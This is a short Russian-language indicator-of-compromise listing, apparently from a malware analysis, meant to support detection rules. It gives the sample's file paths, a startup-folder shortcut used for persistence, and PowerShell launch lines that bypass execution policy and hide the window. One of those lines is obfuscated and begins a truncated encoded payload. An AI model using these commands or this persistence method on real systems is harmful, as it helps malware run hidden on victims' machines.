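Техническая информация
Ниже перечислены пути к файлам, связанным с образцом (включая ярлык в папке автозагрузки Startup), и командные строки запуска PowerShell; заголовки подразделов в этом фрагменте не сохранились. Параметры PowerShell в последней строке записаны в смешанном регистре, поэтому правила обнаружения по командной строке должны сравнивать их без учёта регистра.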
- %APPDATA%\microsoft\windows\start menu\programs\startup\fyqepjfnnubmyjwudrgkrbtizvqadsphxosohltgxcwvmcelakiz.lnk
- %APPDATA%\lfnskwnbcmasd.ps1
- %LOCALAPPDATA%\fyqepjfnnubmyjwudrgkrbtizvqadsphxosohltgxcwvmcelakiz
- %APPDATA%\lfnskwnbcmasd.ps1
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass "%APPDATA%\lfnskwnbcmasd.ps1"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass "%APPDATA%\lfnskwnbcmasd.ps1" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WINdowSTyLE hiDdEN -eXeCutIOnpolIcy byPAsS -cOmManD "$a8132ddd37a4a69f05ff739fa1555='Xk9MNUhAd30kNV5RKmdyQFJ6QnVeUUZJQEBWJF9aQFIrZnRAc1BLVl5Sa3EhXk9MOEJeU3JPTEB2Zzl+QHdsJj5AcSk2NUB2QHFnQHQyOTd...